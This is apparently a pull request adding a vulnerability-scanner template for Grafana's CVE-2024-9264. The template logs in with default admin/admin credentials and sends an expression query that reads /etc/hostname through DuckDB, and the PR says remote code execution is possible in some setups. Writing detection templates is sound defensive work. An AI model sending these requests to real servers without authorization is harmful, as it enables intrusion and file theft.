### PR TITLE
Create Grafana-cve-2024-9264.yaml

### DIFF
--- a/dast/cves/2024/Grafana-cve-2024-9264.yaml
+++ b/dast/cves/2024/Grafana-cve-2024-9264.yaml
@@ -1,0 +1,67 @@
+id: cve-2024-9264
+
+info:
+  name: Grafana DuckDB File Read / RCE (CVE-2024-9264)
+  author: r3dg33k
+  severity: high
+  description: |
+    Grafana is vulnerable to authenticated file read and possible RCE via DuckDB plugin (CVE-2024-9264). If shellfs is installed, RCE is possible.
+  reference:
+    - https://github.com/nollium/CVE-2024-9264
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-9264
+  tags: grafana,duckdb,rce,file-read,cve,cve2024,authenticated
+
+http:
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+          "user": "admin",
+          "password": "admin"
+        }
+
+      - |
+        POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q101 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Cookie: grafana_session={{cookie}}
+
+        {
+          "from": "1729313027261",
+          "queries": [
+            {
+              "datasource": {
+                "name": "Expression",
+                "type": "__expr__",
+                "uid": "__expr__"
+              },
+              "expression": "SELECT content FROM read_blob('/etc/hostname')",
+              "hide": false,
+              "refId": "B",
+              "type": "sql",
+              "window": ""
+            }
+          ],
+          "to": "1729334627261"
+        }
+
+    extractors:
+      - type: regex
+        name: cookie
+        internal: true
+        part: header
+        regex:
+          - 'grafana_session=([^;]+);'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "frames"
+          - "values"
+        condition: and
+
+    matchers-condition: and


### PR DESCRIPTION
### Template / PR Information

a post-auth RCE/file read vulnerability in Grafana when DuckDB is available.

- Fixed cve-2024-9264
- References:

### Template Validation

I've validated this template locally?
- [ ] YES
- [* ] NO

